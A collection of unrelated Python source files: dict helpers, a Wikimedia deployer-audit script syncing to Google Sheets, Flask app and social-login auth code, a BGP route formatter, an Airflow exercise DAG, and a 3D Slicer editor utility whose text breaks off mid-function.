ext | sha | content
---|---|---|
py | b40b16947bd13574540c2cdd8bc01b96d1ee0884 | """
Some basic dicts and field-in-a-dict manipulation helpers.
"""
import collections.abc
import enum
from typing import Any, Callable, Generic, Iterable, Iterator, List, \
Mapping, MutableMapping, Optional, Tuple, TypeVar, Union
FieldPath = Tuple[str, ...]
FieldSpec = Union[None, str, FieldPath, List[str]]
_T = TypeVar('_T')
_K = TypeVar('_K')
_V = TypeVar('_V')
class _UNSET(enum.Enum):
token = enum.auto()
def parse_field(
field: FieldSpec,
) -> FieldPath:
"""
Convert any field into a tuple of nested sub-fields.
Supported notations:
* ``None`` (for root of a dict).
* ``"field.subfield"``
* ``("field", "subfield")``
* ``["field", "subfield"]``
"""
if field is None:
return tuple()
elif isinstance(field, str):
return tuple(field.split('.'))
elif isinstance(field, (list, tuple)):
return tuple(field)
else:
raise ValueError(f"Field must be either a str, or a list/tuple. Got {field!r}")
def resolve(
d: Optional[Mapping[Any, Any]],
field: FieldSpec,
default: Union[_T, _UNSET] = _UNSET.token,
*,
assume_empty: bool = False,
ignore_wrong: bool = False,
) -> Union[Any, _T]:
"""
Retrieve a nested sub-field from a dict.
If ``assume_empty`` is set, the non-existent path keys are assumed
to be empty dictionaries, and the ``default`` is returned.
If ``ignore_wrong`` is set, non-dictionary values are treated as
non-existent, since we cannot dive deeper into them.
This is used in the diff reduction.
Otherwise (by default), any attempt to get a key from ``None``
leads to a ``TypeError`` -- same as in Python: ``None['key']``.
"""
path = parse_field(field)
try:
result = d
for key in path:
if result is None and assume_empty and not isinstance(default, _UNSET):
return default
elif isinstance(result, collections.abc.Mapping):
result = result[key]
elif ignore_wrong:
result = None
else:
raise TypeError(f"The structure is not a dict with field {key!r}: {result!r}")
return result
except KeyError:
if not isinstance(default, _UNSET):
return default
raise
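# Illustrative examples (a sketch, not part of the original module):
#     >>> resolve({'a': {'b': 1}}, 'a.b')
#     1
#     >>> resolve({'a': {}}, 'a.b', default=0)
#     0
#     >>> resolve(None, 'a.b', default=0, assume_empty=True)
#     0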
def ensure(
d: MutableMapping[Any, Any],
field: FieldSpec,
value: Any,
) -> None:
"""
Force-set a nested sub-field in a dict.
If some levels of parents are missing, they are created as empty dicts
(this is what makes it "ensuring", not just "setting").
"""
result = d
path = parse_field(field)
if not path:
raise ValueError("Setting a root of a dict is impossible. Provide the specific fields.")
for key in path[:-1]:
try:
result = result[key]
except KeyError:
result = result.setdefault(key, {})
result[path[-1]] = value
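# Illustrative example (a sketch, not part of the original module):
#     >>> d = {}
#     >>> ensure(d, 'a.b', 1)
#     >>> d
#     {'a': {'b': 1}}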
def remove(
d: MutableMapping[Any, Any],
field: FieldSpec,
) -> None:
"""
Remove a nested sub-field from a dict, and all parents that become empty.
All intermediate parents that become empty after the removal are also
removed, making the whole original dict cleaner. For single-field removal,
use a built-in ``del d[key]`` operation.
If the target key is already absent, or any of the intermediate parents
is absent (which implies that the target key is also absent), no error
is raised, since the goal of the deletion is achieved. The empty parents
are removed anyway.
"""
path = parse_field(field)
if not path:
raise ValueError("Removing a root of a dict is impossible. Provide a specific field.")
elif len(path) == 1:
try:
del d[path[0]]
except KeyError:
pass
else:
try:
# Recursion is the easiest way to implement it, assuming the bodies/patches are shallow.
remove(d[path[0]], path[1:])
except KeyError:
pass
else:
# Clean the parent dict if it has become empty due to deletion of the only sub-key.
# Upper parents will be handled by upper recursion functions.
if d[path[0]] == {}: # but not None, and not False, etc.
del d[path[0]]
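# Illustrative example (a sketch, not part of the original module): the parent
# 'a' becomes empty after the removal, so it is removed too.
#     >>> d = {'a': {'b': 1}, 'c': 2}
#     >>> remove(d, 'a.b')
#     >>> d
#     {'c': 2}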
def cherrypick(
src: Mapping[Any, Any],
dst: MutableMapping[Any, Any],
fields: Optional[Iterable[FieldSpec]],
picker: Optional[Callable[[_T], _T]] = None,
) -> None:
"""
Copy all specified fields between dicts (from src to dst).
"""
picker = picker if picker is not None else lambda x: x
fields = fields if fields is not None else []
for field in fields:
try:
ensure(dst, field, picker(resolve(src, field)))
except KeyError:
pass # absent in the source, nothing to merge
def walk(
objs: Union[_T,
Iterable[_T],
Iterable[Union[_T,
Iterable[_T]]]],
*,
nested: Optional[Iterable[FieldSpec]] = None,
) -> Iterator[_T]:
"""
Iterate over objects, flattening the lists/tuples/iterables recursively.
In plain English, the source is either an object, or a list/tuple/iterable
of objects with any level of nesting. The dicts/mappings are not flattened,
even though they are iterables too, as they are treated as objects themselves.
For the output, it yields all the objects in a flat iterable suitable for::
for obj in walk(objs):
pass
The type signature declares only 2-level nesting, but this is done only
due to the type-checker's limitations. The actual nesting can be infinite.
It is highly unlikely that there will be anything deeper than one level.
"""
if objs is None:
pass
elif isinstance(objs, collections.abc.Mapping):
yield objs # type: ignore
for subfield in (nested if nested is not None else []):
try:
yield resolve(objs, parse_field(subfield))
except KeyError:
pass
elif isinstance(objs, collections.abc.Iterable):
for obj in objs:
yield from walk(obj, nested=nested)
else:
yield objs # NB: not a mapping, no nested sub-fields.
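# Illustrative examples (a sketch, not part of the original module): mappings
# are yielded as whole objects, while other iterables are flattened.
#     >>> list(walk([1, [2, 3]]))
#     [1, 2, 3]
#     >>> list(walk({'a': 1}))
#     [{'a': 1}]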
class MappingView(Generic[_K, _V], Mapping[_K, _V]):
"""
A lazy resolver for the "on-demand" dict keys.
This is needed for the :kwarg:`spec`, :kwarg:`status`, and other fields
to be *assumed* to be dicts, even if they are actually not present.
And to prevent their implicit creation with ``.setdefault('spec', {})``,
which produces unwanted side-effects (actually adds this field).
>>> body = {}
>>> spec = MappingView(body, 'spec')
>>> spec.get('field', 'default')
... 'default'
>>> body['spec'] = {'field': 'value'}
>>> spec.get('field', 'default')
... 'value'
"""
_src: Mapping[_K, _V]
def __init__(self, __src: Mapping[Any, Any], __path: FieldSpec = None) -> None:
super().__init__()
self._src = __src
self._path = parse_field(__path)
def __repr__(self) -> str:
return repr(dict(self))
def __len__(self) -> int:
return len(resolve(self._src, self._path, {}, assume_empty=True))
def __iter__(self) -> Iterator[Any]:
return iter(resolve(self._src, self._path, {}, assume_empty=True))
def __getitem__(self, item: _K) -> _V:
return resolve(self._src, self._path + (item,))
class MutableMappingView(Generic[_K, _V], MappingView[_K, _V], MutableMapping[_K, _V]):
"""
A mapping view with values stored and sub-dicts auto-created.
>>> patch = {}
>>> status = MutableMappingView(patch, 'status')
>>> status.get('field', 'default')
... 'default'
>>> patch
... {}
>>> status['field'] = 'value'
>>> patch
... {'status': {'field': 'value'}}
>>> status.get('field', 'default')
... 'value'
"""
_src: MutableMapping[_K, _V] # type clarification
def __delitem__(self, item: _K) -> None:
d = resolve(self._src, self._path)
del d[item]
def __setitem__(self, item: _K, value: _V) -> None:
ensure(self._src, self._path + (item,), value)
class ReplaceableMappingView(Generic[_K, _V], MappingView[_K, _V]):
"""
A mapping view where the whole source can be replaced atomically.
All derived mapping views that use this mapping view as their source will
immediately notice the change.
The method names are intentionally long and multi-word -- to not have
potential collisions with regular expected attributes/properties.
>>> body = ReplaceableMappingView()
>>> spec = MappingView(body, 'spec')
>>> spec.get('field', 'default')
... 'default'
>>> body._replace_with({'spec': {'field': 'value'}})
>>> spec.get('field', 'default')
... 'value'
"""
def _replace_from(self, __src: MappingView[_K, _V]) -> None:
self._src = __src._src
def _replace_with(self, __src: Mapping[_K, _V]) -> None:
self._src = __src
|
py | b40b1746125d2caba5ea5bd4f8d388a7054ea4f0 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Tool to audit Wikimedia deployers
Author: [email protected]
License: Apache 2.0
Uses: github.com (for raw data.yaml file), google sheets API
"""
import argparse
import datetime
import pickle
import os
import re
import requests
import sys
import urllib.parse
import yaml
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from dotenv import load_dotenv
""" constants """
load_dotenv()
SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
GET_RANGE = "Deployers Audit!A2:G"
WRITE_RANGE = "Deployers Audit!A2"
ADMIN_DATA_FILE = os.getenv('DTG_ADMIN_DATA_FILE')
SPREADSHEET_ID = os.getenv('DTG_GOOGLE_SHEET_ID')
SAL_URL_BASE = os.getenv('DTG_SAL_URL_BASE')
SAL_YEARS_PREV = os.getenv('DTG_SAL_YEARS_PREV')
NO_DEPLOYS = 'No deploys last 2 years'
def main():
""" cli args/control """
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--phab', action='store_true',
default=False,
help='Optionally print Phab-formatted '
'table to stdout')
parser.add_argument('-n', '--nodeploys', action='store_true',
default=False,
help='Only print "no deploy" users for '
'Phab-formatted table')
args, unknown = parser.parse_known_args()
""" process Google Sheets API creds """
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
""" If there are no (valid) credentials available, let the user log in. """
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
""" Save the credentials for the next run """
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('sheets', 'v4', credentials=creds)
""" get and process admin.yaml """
resp = requests.get(ADMIN_DATA_FILE)
if resp.status_code != 200:
print("Response Error, status code = {}".format(resp.status_code))
sys.exit(1)
else:
deployers_from_yaml = []
data = yaml.safe_load(resp.text)
if isinstance(data, dict):
deployers_from_yaml = data['groups']['deployment']['members']
deployers_from_yaml.sort()
""" try to find last deployed data for a deployer
wikitech:index.php?title=Server_admin_log/Archives&action=raw
wikitech:index.php?title=Server_admin_log&action=raw
search back dates for user - pattern: 'nn:nn {user}:' """
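# Illustrative example of the matching below (the exact SAL line format shown
# here is an assumption, not taken from the original source): a date header
# looks like '== 2020-01-02 ==' and an entry line looks like
# '* 12:34 jdoe: deployed foo', so for user 'jdoe':
#     >>> bool(re.search(r'(\*\s?\d\d\:\d\d\s+)(jdoe)', '* 12:34 jdoe: deployed foo', re.I))
#     True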
full_log_text = ''
deployers_last_deploy = {}
""" current last deploy data from sal """
current_url = ''.join([SAL_URL_BASE, 'Server%20Admin%20Log&action=raw'])
resp = requests.get(current_url)
if resp.status_code != 200:
print("Response Error, status code = {}".format(resp.status_code))
sys.exit(1)
else:
full_log_text = ''.join([full_log_text, resp.text])
""" historic last deploy data from sal """
historic_url = ''.join([SAL_URL_BASE,
'Server_admin_log/Archives&action=raw'])
resp = requests.get(historic_url)
if resp.status_code != 200:
print("Response Error, status code = {}".format(resp.status_code))
sys.exit(1)
else:
years = [datetime.datetime.now().year,
datetime.datetime.now().year - int(SAL_YEARS_PREV)]
for year in years:
for line in resp.text.split('\n'):
pat = ''.join([r'\[\[(.+)\|', str(year), r'.+'])
found = re.findall(pat, line)
if found:
for archive in found:
archive_url = ''.join([SAL_URL_BASE,
urllib.parse.quote(archive),
'&action=raw'])
aresp = requests.get(archive_url)
if aresp.status_code != 200:
print("Response Error, status code = {}".format(
resp.status_code))
sys.exit(1)
else:
full_log_text = ''.join([full_log_text,
aresp.text])
""" process last deploy data """
for dep in deployers_from_yaml:
for line in full_log_text.split('\n'):
pat_date = r'==\s*(\d{4}\-\d{2}\-\d{2})\s*=='
found_date = re.match(pat_date, line)
if 'current_last_deploy_date' not in locals():
current_last_deploy_date = NO_DEPLOYS
if found_date:
current_last_deploy_date = found_date.group(1)
continue
pat_dep = ''.join([r'(\*\s?\d\d\:\d\d\s+)(', str(dep), r')'])
if re.search(pat_dep, line, re.I):
if ((dep in deployers_last_deploy and
deployers_last_deploy[dep] <
current_last_deploy_date) or
dep not in deployers_last_deploy):
deployers_last_deploy[dep] = current_last_deploy_date
continue
if dep not in deployers_last_deploy:
deployers_last_deploy[dep] = NO_DEPLOYS
""" get current data from Google Sheet """
sheet = service.spreadsheets()
result = sheet.values().get(spreadsheetId=SPREADSHEET_ID,
range=GET_RANGE).execute()
deployers_from_sheet_data = result.get('values', [])
""" update and sync all data thus far """
deployers_all = []
deployers_from_sheet = []
deployers_to_write_to_sheet = []
for dep in deployers_from_sheet_data:
if(isinstance(dep, list) and len(dep) > 0 and isinstance(dep[0], str)):
deployers_from_sheet.append(dep[0])
deployers_all = list(set().union(
deployers_from_sheet,
deployers_from_yaml)
)
deployers_all.sort()
update_time = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M')
for dep in deployers_all:
if(len(deployers_from_sheet_data) > 0):
dep_found = False
dep_last_deploy = deployers_last_deploy.get(dep, NO_DEPLOYS)
for dep_data in deployers_from_sheet_data:
if(isinstance(dep_data, list) and
isinstance(dep, str) and
dep == dep_data[0]):
if len(dep_data) == 1:
dep_data.append("")
if len(dep_data) == 2:
dep_data.append("0")
if len(dep_data) == 3:
dep_data.append("0")
if len(dep_data) == 4:
dep_data.append("0")
if len(dep_data) == 5:
dep_data.append("")
elif(len(dep_data[5]) == 0 or
dep_data[5] != dep_last_deploy):
dep_data[5] = dep_last_deploy
if len(dep_data) == 6:
dep_data.append(update_time)
else:
dep_data[6] = update_time
dep_data.pop(0)
deployers_to_write_to_sheet.append([dep] + dep_data)
dep_found = True
if(dep_found is False):
deployers_to_write_to_sheet.append(
[dep, "", "0", "0", "0", dep_last_deploy, update_time])
""" write updated data to Google Sheet """
result2 = sheet.values().update(
spreadsheetId=SPREADSHEET_ID,
range=WRITE_RANGE,
body={"range": WRITE_RANGE,
"values": deployers_to_write_to_sheet,
"majorDimension": "ROWS"},
valueInputOption="RAW").execute()
print('Google sheet has been updated.')
""" optionally format output as Phab table """
if(args.phab):
print('\n| Shell username | Name | WMF | WMDE | '
'WMF Legal NDA? | Last Deployed | Date Updated')
print('| --- | --- | --- | --- | --- | --- | ---')
for row in deployers_to_write_to_sheet:
if(args.nodeploys and row[5] == NO_DEPLOYS):
print('|', ' | '.join(row))
elif(not args.nodeploys):
print('|', ' | '.join(row))
""" call main """
if __name__ == '__main__':
main()
|
py | b40b17683d0192461c655c5db06f9997666b3374 | import flask
import os
import sys
folder = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.insert(0, folder)
app = flask.Flask(__name__)
def main():
register_blueprints()
print(os.getcwd())
app.run(debug=True)
# def register_blueprints():
# from views import home_views
# app.register_blueprint(home_views.blueprint)
def register_blueprints():
from badgettingbetter.views import post_views
from badgettingbetter.views import home_views
app.register_blueprint(home_views.blueprint)
app.register_blueprint(post_views.blueprint)
if __name__ == "__main__":
main() |
py | b40b1994bfca4ea03ba6eef520956c1e9d85cfae | import StringIO
class RouteFormatterMixin(object):
fmtstr = ' {0:<3s} {1:<32s} {2:<8s} {3:<20s} {4:<15s} '\
'{5:<6s} {6:<6s} {7:<}\n'
@classmethod
def _format_family_header(cls):
ret = ''
ret += ('Status codes: * valid, > best\n')
ret += ('Origin codes: i - IGP, e - EGP, ? - incomplete\n')
ret += cls.fmtstr.format('', 'Network', 'Labels', 'Next Hop', 'Reason',
'Metric', 'LocPrf', 'Path')
return ret
@classmethod
def _format_family(cls, dest_list):
msg = StringIO.StringIO()
def _append_path_info(buff, path, is_best, show_prefix):
aspath = path.get('aspath')
origin = path.get('origin')
if origin:
aspath.append(origin)
bpr = path.get('bpr')
next_hop = path.get('nexthop')
med = path.get('metric')
labels = path.get('labels')
localpref = path.get('localpref')
# Construct path status string.
path_status = '*'
if is_best:
path_status += '>'
# Check if we want to show prefix.
prefix = ''
if show_prefix:
prefix = path.get('prefix')
# Append path info to String buffer.
buff.write(cls.fmtstr.format(path_status, prefix, labels,
next_hop, bpr, str(med),
str(localpref),
' '.join(map(str, aspath))))
for dist in dest_list:
for idx, path in enumerate(dist.get('paths')):
_append_path_info(msg, path, path['best'], (idx == 0))
ret = msg.getvalue()
msg.close()
return ret
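# Illustrative shape of ``dest_list`` (inferred from the ``path.get()`` calls
# above; an assumption, not from upstream docs):
#     dest_list = [{'paths': [{'aspath': [65001, 65002], 'origin': 'i',
#                              'bpr': 'Only Path', 'nexthop': '10.0.0.1',
#                              'metric': 0, 'labels': None, 'localpref': 100,
#                              'prefix': '10.1.0.0/24', 'best': True}]}]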
|
py | b40b1b14f4677e601b26b5925a3cedc862a9659b | import logging
from flask import Blueprint, request, after_this_request, redirect, current_app, jsonify, url_for, g
from flask_login import current_user, login_required
from flask_security import login_user
from flask_security.decorators import anonymous_user_required
from flask_security.utils import config_value
from social_core.actions import do_complete, do_auth, do_disconnect
from social_flask.utils import psa
from werkzeug.local import LocalProxy
bp_auth = Blueprint('auth', __name__, url_prefix='/auth')
security = LocalProxy(lambda: current_app.extensions['security'])
datastore = LocalProxy(lambda: security.datastore)
def do_login(backend, user, social_user):
name = backend.strategy.setting('REMEMBER_SESSION_NAME', 'keep')
remember = backend.strategy.session_get(name) or \
request.cookies.get(name) or \
request.args.get(name) or \
request.form.get(name) or \
False
security.datastore.add_role_to_user(user, 'user')
security.datastore.remove_role_from_user(user, 'anonymous')
return login_user(user, remember=remember)
def _commit(response=None):
datastore.commit()
return response
def _ctx(endpoint):
return security._run_ctx_processor(endpoint)
@bp_auth.route('/login', methods=['GET'])
@bp_auth.route('/login/<string:backend>/', methods=('GET', 'POST'))
@anonymous_user_required
@psa('auth.complete')
def login(backend):
return do_auth(g.backend)
@bp_auth.route('/complete/<string:backend>/', methods=('GET', 'POST'))
@psa('auth.complete')
def complete(backend, *args, **kwargs):
return do_complete(g.backend, login=do_login, user=current_user, *args, **kwargs)
@bp_auth.route('/disconnect/<string:backend>/', methods=('POST',))
@bp_auth.route('/disconnect/<string:backend>/<int:association_id>/', methods=('POST',))
@bp_auth.route('/disconnect/<string:backend>/<string:association_id>/', methods=('POST',))
@login_required
@psa()
def disconnect(backend, association_id=None):
return do_disconnect(g.backend, g.user, association_id)
@bp_auth.route('/admin-login', methods=['GET', 'POST'], endpoint='admin_login')
@anonymous_user_required
def admin_login():
form_class = security.login_form
form = form_class(request.form)
if form.validate_on_submit():
login_user(form.user, remember=form.remember.data)
after_this_request(_commit)
return redirect(form.next.data or url_for('admin.index'))
return security.render_template(
config_value('LOGIN_USER_TEMPLATE'), login_user_form=form, **_ctx('login'))
|
py | b40b1bf07173aca6219311a322fa7fd10790ded9 | import datetime
import logging
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
def hello_world():
logging.info("Hello World")
def addition():
logging.info(f"2 + 2 = {2+2}")
def subtraction():
logging.info(f"6 -2 = {6-2}")
def division():
logging.info(f"10 / 2 = {int(10/2)}")
dag = DAG(
"lesson1.exercise3",
schedule_interval='@hourly',
start_date=datetime.datetime.now() - datetime.timedelta(days=1))
hello_world_task = PythonOperator(
task_id="hello_world",
python_callable=hello_world,
dag=dag)
#
# TODO: Define an addition task that calls the `addition` function above
#
addition_task = PythonOperator(
task_id="addition",
python_callable=addition,
dag=dag)
#
# TODO: Define a subtraction task that calls the `subtraction` function above
#
subtraction_task = PythonOperator(
task_id="subtraction",
python_callable=subtraction,
dag=dag)
#
# TODO: Define a division task that calls the `division` function above
#
division_task = PythonOperator(
task_id="division",
python_callable=division,
dag=dag)
#
# TODO: Configure the task dependencies such that the graph looks like the following:
#
# -> addition_task
# / \
# hello_world_task -> division_task
# \ /
# ->subtraction_task
hello_world_task >> addition_task
hello_world_task >> subtraction_task
addition_task >> division_task
subtraction_task >> division_task |
py | b40b1c463d1402f46a4ef81add7869867d8b7539 | import vtk
import slicer
import logging
from slicer.util import NodeModify
__all__ = ['EditUtil']
#########################################################
#
#
comment = """
EditUtil holds utility functions required by the other
editor classes
Note: this needs to be a class so it can be reloaded
# TODO :
"""
#
#########################################################
class EditUtil(object):
@staticmethod
def getParameterNode():
"""Get the Editor parameter node - a singleton in the scene"""
node = EditUtil._findParameterNodeInScene()
if not node:
node = EditUtil._createParameterNode()
return node
@staticmethod
def _findParameterNodeInScene():
node = None
size = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLScriptedModuleNode")
for i in range(size):
n = slicer.mrmlScene.GetNthNodeByClass( i, "vtkMRMLScriptedModuleNode" )
if n.GetModuleName() == "Editor" and n.GetSingletonTag() == "Editor":
node = n
return node
@staticmethod
def _createParameterNode():
"""create the Editor parameter node - a singleton in the scene
This is used internally by getParameterNode - shouldn't really
be called for any other reason.
"""
node = slicer.vtkMRMLScriptedModuleNode()
node.SetSingletonTag( "Editor" )
node.SetModuleName( "Editor" )
node.SetParameter( "label", "1" )
node.SetParameter( "effect", "DefaultTool" )
node.SetParameter( "propagationMode", str(slicer.vtkMRMLApplicationLogic.BackgroundLayer | slicer.vtkMRMLApplicationLogic.LabelLayer) )
slicer.mrmlScene.AddNode(node)
# Since we are a singleton, the scene won't add our node into the scene,
# but will instead insert a copy, so we find that and return it
node = EditUtil._findParameterNodeInScene()
return node
@staticmethod
def getCurrentEffect():
"""return effect associated with the editor parameter node.
"""
return EditUtil.getParameterNode().GetParameter('effect')
@staticmethod
def setCurrentEffect(name):
"""set current effect on the editor parameter node.
"""
if name != 'EraseLabel':
EditUtil.getParameterNode().SetParameter('effect', name)
else:
EditUtil.toggleLabel()
@staticmethod
def getCompositeNode(layoutName='Red'):
""" use the Red slice composite node to define the active volumes """
count = slicer.mrmlScene.GetNumberOfNodesByClass('vtkMRMLSliceCompositeNode')
for n in range(count):
compNode = slicer.mrmlScene.GetNthNodeByClass(n, 'vtkMRMLSliceCompositeNode')
if compNode.GetLayoutName() == layoutName:
return compNode
@staticmethod
def getSliceWidget(layoutName='Red'):
""" use the Red slice widget as the default"""
layoutManager = slicer.app.layoutManager()
sliceWidget = layoutManager.sliceWidget(layoutName)
return sliceWidget
@staticmethod
def getSliceLogic(layoutName='Red'):
""" use the Red slice logic as the default for operations that are
not specific to a slice widget"""
sliceWidget = EditUtil.getSliceWidget(layoutName)
return sliceWidget.sliceLogic()
@staticmethod
def getBackgroundImage():
backgroundVolume = EditUtil.getBackgroundVolume()
if backgroundVolume:
return backgroundVolume.GetImageData()
@staticmethod
def getBackgroundVolume():
compNode = EditUtil.getCompositeNode()
if compNode:
backgroundID = compNode.GetBackgroundVolumeID()
if backgroundID:
return slicer.mrmlScene.GetNodeByID(backgroundID)
@staticmethod
def getBackgroundID():
compNode = EditUtil.getCompositeNode()
if compNode:
return compNode.GetBackgroundVolumeID()
@staticmethod
def getLabelImage():
labelVolume = EditUtil.getLabelVolume()
if labelVolume:
return labelVolume.GetImageData()
@staticmethod
def getLabelID():
compNode = EditUtil.getCompositeNode()
if compNode:
return compNode.GetLabelVolumeID()
@staticmethod
def getLabelVolume():
compNode = EditUtil.getCompositeNode()
if compNode:
labelID = compNode.GetLabelVolumeID()
if labelID:
return slicer.mrmlScene.GetNodeByID(labelID)
@staticmethod
def getColorNode():
if not EditUtil.isEraseEffectEnabled():
EditUtil.backupLabel()
labelNode = EditUtil.getLabelVolume()
if labelNode:
dispNode = labelNode.GetDisplayNode()
if dispNode:
return ( dispNode.GetColorNode() )
@staticmethod
def getLabel():
return int(EditUtil.getParameterNode().GetParameter('label'))
@staticmethod
def setLabel(label):
EditUtil.getParameterNode().SetParameter('label',str(label))
@staticmethod
def getPropagationMode():
defaultPropagationMode = slicer.vtkMRMLApplicationLogic.BackgroundLayer | slicer.vtkMRMLApplicationLogic.LabelLayer
propagationMode = defaultPropagationMode
propagationModeString = EditUtil.getParameterNode().GetParameter('propagationMode')
try:
propagationMode = int(propagationModeString)
except ValueError:
propagationMode = defaultPropagationMode
EditUtil.setPropagateMode(defaultPropagationMode)
return propagationMode
@staticmethod
def setPropagateMode(propagationMode):
EditUtil.getParameterNode().SetParameter('propagationMode',str(propagationMode))
@staticmethod
def setActiveVolumes(masterVolume, mergeVolume=None):
"""make the master node the active background, and the merge node the active label
"""
if isinstance(masterVolume, str):
masterVolume = slicer.mrmlScene.GetNodeByID(masterVolume)
if isinstance(mergeVolume, str):
mergeVolume = slicer.mrmlScene.GetNodeByID(mergeVolume)
selectionNode = slicer.app.applicationLogic().GetSelectionNode()
selectionNode.SetActiveVolumeID(masterVolume.GetID())
if mergeVolume:
selectionNode.SetActiveLabelVolumeID(mergeVolume.GetID())
EditUtil.propagateVolumeSelection()
@staticmethod
def propagateVolumeSelection():
mode = EditUtil.getPropagationMode()
applicationLogic = slicer.app.applicationLogic()
applicationLogic.PropagateVolumeSelection(mode, 0)
@staticmethod
def backupLabel():
"""Save current label into 'storedLabel' parameter node attribute"""
EditUtil.getParameterNode().SetParameter('storedLabel',str(EditUtil.getLabel()))
@staticmethod
def restoreLabel():
"""Restore the label saved as 'storedLabel' parameter node attribute"""
storedLabel = EditUtil.getParameterNode().GetParameter('storedLabel')
if storedLabel:
EditUtil.setLabel(storedLabel)
@staticmethod
def toggleLabel():
"""toggle the current label map in the editor parameter node"""
if EditUtil.isEraseEffectEnabled():
EditUtil.restoreLabel()
else:
EditUtil.backupLabel()
EditUtil.setLabel(0)
@staticmethod
def isEraseEffectEnabled():
if slicer.mrmlScene.IsBatchProcessing():
return False
return EditUtil.getLabel() == 0
@staticmethod
def setEraseEffectEnabled(enabled):
with NodeModify(EditUtil.getParameterNode()):
if enabled and not EditUtil.isEraseEffectEnabled():
EditUtil.backupLabel()
EditUtil.setLabel(0)
elif not enabled and EditUtil.isEraseEffectEnabled():
EditUtil.restoreLabel()
@staticmethod
def getLabelColor():
"""returns rgba tuple for the current paint color """
labelVolume = EditUtil.getLabelVolume()
if labelVolume:
volumeDisplayNode = labelVolume.GetDisplayNode()
if volumeDisplayNode is not None:
colorNode = volumeDisplayNode.GetColorNode()
lut = colorNode.GetLookupTable()
index = EditUtil.getLabel()
return lut.GetTableValue(index)
return (0,0,0,0)
@staticmethod
def getLabelName():
"""returns the string name of the currently selected index """
labelVolume = EditUtil.getLabelVolume()
if labelVolume:
volumeDisplayNode = labelVolume.GetDisplayNode()
if volumeDisplayNode is not None:
colorNode = volumeDisplayNode.GetColorNode()
index = EditUtil.getLabel()
return colorNode.GetColorName(index)
return ""
@staticmethod
def toggleCrosshair():
"""Turn on or off the crosshair and enable navigation mode
by manipulating the scene's singleton crosshair node.
"""
crosshairNode = slicer.mrmlScene.GetFirstNodeByClass('vtkMRMLCrosshairNode')
if crosshairNode:
if crosshairNode.GetCrosshairMode() == 0:
crosshairNode.SetCrosshairMode(1)
else:
crosshairNode.SetCrosshairMode(0)
@staticmethod
def toggleLabelOutline():
"""Switch the label outline mode for all composite nodes in the scene"""
for sliceNode in slicer.util.getNodes('vtkMRMLSliceNode*').values():
sliceNode.SetUseLabelOutline(not sliceNode.GetUseLabelOutline())
@staticmethod
def setLabelOutline(state):
"""Set the label outline mode for all composite nodes in the scene to state"""
for sliceNode in slicer.util.getNodes('vtkMRMLSliceNode*').values():
sliceNode.SetUseLabelOutline(state)
@staticmethod
def toggleForegroundBackground():
"""Swap the foreground and background volumes for all composite nodes in the scene"""
for sliceCompositeNode in slicer.util.getNodes('vtkMRMLSliceCompositeNode*').values():
oldForeground = sliceCompositeNode.GetForegroundVolumeID()
sliceCompositeNode.SetForegroundVolumeID(sliceCompositeNode.GetBackgroundVolumeID())
sliceCompositeNode.SetBackgroundVolumeID(oldForeground)
@staticmethod
def markVolumeNodeAsModified(volumeNode):
"""Mark all parts of a volume node as modified so that a correct
render is triggered. This includes setting the modified flag on the
point data scalars so that the GetScalarRange method will return the
correct value, and certain operations like volume rendering will
know to update.
http://na-mic.org/Bug/view.php?id=3076
This method should be called any time the image data has been changed
via an editing operation.
Note that this call will typically schedule a render operation to be
performed the next time the event loop is idle.
"""
if volumeNode.GetImageDataConnection():
volumeNode.GetImageDataConnection().GetProducer().Update()
if volumeNode.GetImageData().GetPointData().GetScalars() is not None:
volumeNode.GetImageData().GetPointData().GetScalars().Modified()
volumeNode.GetImageData().Modified()
volumeNode.Modified()
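# Typical call site (an illustrative sketch, not from the original file):
#     labelVolume = EditUtil.getLabelVolume()
#     ...  # an effect paints into labelVolume.GetImageData()
#     EditUtil.markVolumeNodeAsModified(labelVolume)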
@staticmethod
def structureVolume(masterNode, structureName, mergeVolumePostfix="-label"):
"""Return the per-structure volume associated with the master node for the given
structure name"""
masterName = masterNode.GetName()
structureVolumeName = masterName+"-%s"%structureName + mergeVolumePostfix
return slicer.util.getFirstNodeByName(structureVolumeName, className=masterNode.GetClassName())
@staticmethod
def addStructure(masterNode, mergeNode, structureLabel, mergeVolumePostfix="-label"):
"""Make a new per-structure volume for the given label associated with the given master
and merge nodes"""
colorNode = mergeNode.GetDisplayNode().GetColorNode()
structureName = colorNode.GetColorName( structureLabel )
structureName = masterNode.GetName()+"-%s"%structureName+mergeVolumePostfix
if EditUtil.structureVolume(masterNode, structureName, mergeVolumePostfix) is None:
volumesLogic = slicer.modules.volumes.logic()
struct = volumesLogic.CreateAndAddLabelVolume( slicer.mrmlScene, masterNode, structureName )
struct.SetName(structureName)
struct.GetDisplayNode().SetAndObserveColorNodeID( colorNode.GetID() )
@staticmethod
def splitPerStructureVolumes(masterNode, mergeNode):
"""Make a separate label map node for each non-empty label value in the
merged label map"""
colorNode = mergeNode.GetDisplayNode().GetColorNode()
accum = vtk.vtkImageAccumulate()
accum.SetInputConnection(mergeNode.GetImageDataConnection())
accum.Update()
lo = int(accum.GetMin()[0])
hi = int(accum.GetMax()[0])
thresholder = vtk.vtkImageThreshold()
for index in range(lo,hi+1):
logging.info( "Splitting label %d..."%index )
thresholder.SetInputConnection( mergeNode.GetImageDataConnection() )
thresholder.SetInValue( index )
thresholder.SetOutValue( 0 )
thresholder.ReplaceInOn()
thresholder.ReplaceOutOn()
thresholder.ThresholdBetween( index, index )
thresholder.SetOutputScalarType( mergeNode.GetImageData().GetScalarType() )
thresholder.Update()
if thresholder.GetOutput().GetScalarRange() != (0.0, 0.0):
structureName = colorNode.GetColorName(index)
logging.info( "Creating structure volume %s..."%structureName )
structureVolume = EditUtil.structureVolume( masterNode, structureName )
